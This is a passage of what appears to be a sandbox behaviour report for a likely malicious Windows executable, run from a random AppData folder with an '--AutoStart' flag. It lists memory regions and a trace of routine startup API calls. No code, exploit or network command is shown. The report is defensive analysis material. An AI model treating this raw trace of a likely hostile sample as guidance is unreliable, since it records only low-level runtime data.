0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1665 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1666 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1667 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1668 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1669 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1670 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498550 region_type = mapped_file name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") Region: id = 1671 start_va = 0x77120000 end_va = 0x772c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1672 start_va = 0x77300000 end_va = 0x7747ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1673 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1674 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1675 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1676 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1677 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1678 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1679 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1816 start_va = 0x1a0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1817 start_va = 0x73a90000 end_va = 0x73acefff monitored = 0 entry_point = 0x73abe088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1818 start_va = 0x73a30000 end_va = 0x73a8bfff monitored = 0 entry_point = 0x73a6f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1819 start_va = 0x73a20000 end_va = 0x73a27fff monitored = 0 entry_point = 0x73a220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1820 start_va = 0x76f00000 end_va = 0x7701efff monitored = 0 entry_point = 0x76f15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1821 start_va = 0x75cd0000 end_va = 0x75ddffff monitored = 0 entry_point = 0x75ce3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1822 start_va = 0x76f00000 end_va = 0x7701efff monitored = 0 entry_point = 0x76f15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1823 start_va = 0x76f00000 end_va = 0x7701efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076f00000" filename = "" Region: id = 1824 start_va = 0x77020000 end_va = 0x77119fff monitored = 0 entry_point = 0x7703a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1825 start_va = 0x77020000 end_va = 0x77119fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077020000" filename = "" Region: id = 1826 start_va = 0x2540000 end_va = 0x27bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1827 start_va = 0x75cd0000 end_va = 0x75ddffff monitored = 0 entry_point = 0x75ce3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1828 start_va = 0x76ad0000 end_va = 0x76b16fff monitored = 0 entry_point = 0x76ad74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1829 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1830 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1831 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1832 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1833 start_va = 0x320000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1834 start_va = 0x76010000 end_va = 0x7610ffff monitored = 0 entry_point = 0x7602b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1835 start_va = 0x768d0000 end_va = 0x7695ffff monitored = 0 entry_point = 0x768e6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1836 start_va = 0x76720000 end_va = 0x76729fff monitored = 0 entry_point = 0x767236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1837 start_va = 0x76a30000 end_va = 0x76accfff monitored = 0 entry_point = 0x76a63fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1838 start_va = 0x76b60000 end_va = 0x76c0bfff monitored = 0 entry_point = 0x76b6a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1839 start_va = 0x76110000 end_va = 0x761affff monitored = 0 entry_point = 0x761249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1840 start_va = 0x76ec0000 end_va = 0x76ed8fff monitored = 0 entry_point = 0x76ec4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1841 start_va = 0x75f20000 end_va = 0x7600ffff monitored = 0 entry_point = 0x75f30569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1842 start_va = 0x74e50000 end_va = 0x74eaffff monitored = 0 entry_point = 0x74e6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1843 start_va = 0x74e40000 end_va = 0x74e4bfff monitored = 0 entry_point = 0x74e410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1844 start_va = 0x210000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1845 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1846 start_va = 0x27c0000 end_va = 0x2947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027c0000" filename = "" Region: id = 1847 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1848 start_va = 0x74eb0000 end_va = 0x74f0ffff monitored = 0 entry_point = 0x74ec158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1849 start_va = 0x76960000 end_va = 0x76a2bfff monitored = 0 entry_point = 0x7696168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1850 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1851 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1852 start_va = 0x240000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1853 start_va = 0x2950000 end_va = 0x2ad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002950000" filename = "" Region: id = 1854 start_va = 0x2ae0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ae0000" filename = "" Region: id = 1855 start_va = 0x240000 end_va = 0x2d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1856 start_va = 0x2f0000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1857 start_va = 0x3ee0000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 1858 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1859 start_va = 0x230000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1860 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1861 start_va = 0x2540000 end_va = 0x265afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1862 start_va = 0x26c0000 end_va = 0x27bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 1863 start_va = 0x74da0000 end_va = 0x74e1ffff monitored = 0 entry_point = 0x74db37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1864 start_va = 0x3ee0000 end_va = 0x3fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 1865 start_va = 0x3fe0000 end_va = 0x40befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fe0000" filename = "" Region: id = 1866 start_va = 0x74d70000 end_va = 0x74d82fff monitored = 0 entry_point = 0x74d71d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1867 start_va = 0x210000 end_va = 0x212fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1868 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Thread: id = 122 os_tid = 0x6fc [0166.465] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xd19fbb00, dwHighDateTime=0x1d8a8b9)) [0166.465] GetCurrentProcessId () returned 0x6f8 [0166.465] GetCurrentThreadId () returned 0x6fc [0166.465] GetTickCount () returned 0xa4c8 [0166.465] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=1514611812359) returned 1 [0166.466] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x49ee10)) [0166.466] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0166.466] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2f0000 [0166.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75cd0000 [0166.467] GetProcAddress (hModule=0x75cd0000, lpProcName="FlsAlloc") returned 0x75ce4ee3 [0166.467] GetProcAddress (hModule=0x75cd0000, lpProcName="FlsGetValue") returned 0x75ce1252 [0166.467] GetProcAddress (hModule=0x75cd0000, lpProcName="FlsSetValue") returned 0x75ce41c0 [0166.468] GetProcAddress (hModule=0x75cd0000, lpProcName="FlsFree") returned 0x75ce354f [0166.469] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x214) returned 0x2f07d0 [0166.469] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75cd0000 [0166.469] GetCurrentThreadId () returned 0x6fc [0166.469] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x49a6f6, hStdOutput=0x49aa2f, hStdError=0x2f07d0)) [0166.470] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x2f09f0 [0166.470] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0166.470] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0166.470] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0166.470] SetHandleCount (uNumber=0x20) returned 0x20 [0166.470] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart" [0166.470] GetEnvironmentStringsW () returned 0x26d2108* [0166.470] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0xb46) returned 0x2f11f8 [0166.558] FreeEnvironmentStringsW (penv=0x26d2108) returned 1 [0166.558] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x252b980, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x8a [0166.558] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x13a) returned 0x2f1d48 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x9c) returned 0x2f1e90 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3e) returned 0x2f1f38 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x56) returned 0x2f1f80 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x6e) returned 0x2f1fe8 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x78) returned 0x2f2060 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x62) returned 0x2f20e0 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x30) returned 0x2f2150 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x2f2188 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x28) returned 0x2f21d8 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1a) returned 0x2f2208 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x34) returned 0x2f2230 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x5c) returned 0x2f2270 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x32) returned 0x2f22d8 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2e) returned 0x2f2318 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1c) returned 0x2f2350 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12a) returned 0x2f2378 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x7c) returned 0x2f24b0 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x36) returned 0x2f2538 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3a) returned 0x2f2578 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x90) returned 0x2f25c0 [0166.559] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x2f2658 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x30) returned 0x2f2688 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x36) returned 0x2f26c0 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x2f2700 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x52) returned 0x2f2750 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3c) returned 0x2f27b0 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xd6) returned 0x2f27f8 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2e) returned 0x2f28d8 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x28) returned 0x2f2910 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x2f2940 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2c) returned 0x2f2968 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x54) returned 0x2f29a0 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x52) returned 0x2f2a00 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2c) returned 0x2f2a60 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x26) returned 0x2f2a98 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3e) returned 0x2f2ac8 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x2f2b10 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x30) returned 0x2f2b40 [0166.560] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x8c) returned 0x2f2b78 [0166.565] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f11f8 | out: hHeap=0x2f0000) returned 1 [0166.566] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0166.566] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x80) returned 0x2f2c10 [0166.566] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x2f11f8 [0166.566] GetLastError () returned 0x0 [0166.566] SetLastError (dwErrCode=0x0) [0166.566] GetLastError () returned 0x0 [0166.566] SetLastError (dwErrCode=0x0) [0166.566] GetLastError () returned 0x0 [0166.567] SetLastError (dwErrCode=0x0) [0166.567] GetACP () returned 0x4e4 [0166.567] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x220) returned 0x2f1a00 [0166.567] GetLastError () returned 0x0 [0166.567] SetLastError (dwErrCode=0x0) [0166.567] IsValidCodePage (CodePage=0x4e4) returned 1 [0166.567] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0166.567] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0166.567] GetLastError () returned 0x0 [0166.567] SetLastError (dwErrCode=0x0) [0166.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0166.567] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0166.567] GetLastError () returned 0x0 [0166.567] SetLastError (dwErrCode=0x0) [0166.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﶘᆮ᫄JĀ") returned 256 [0166.567] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﶘᆮ᫄JĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0166.567] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﶘᆮ᫄JĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 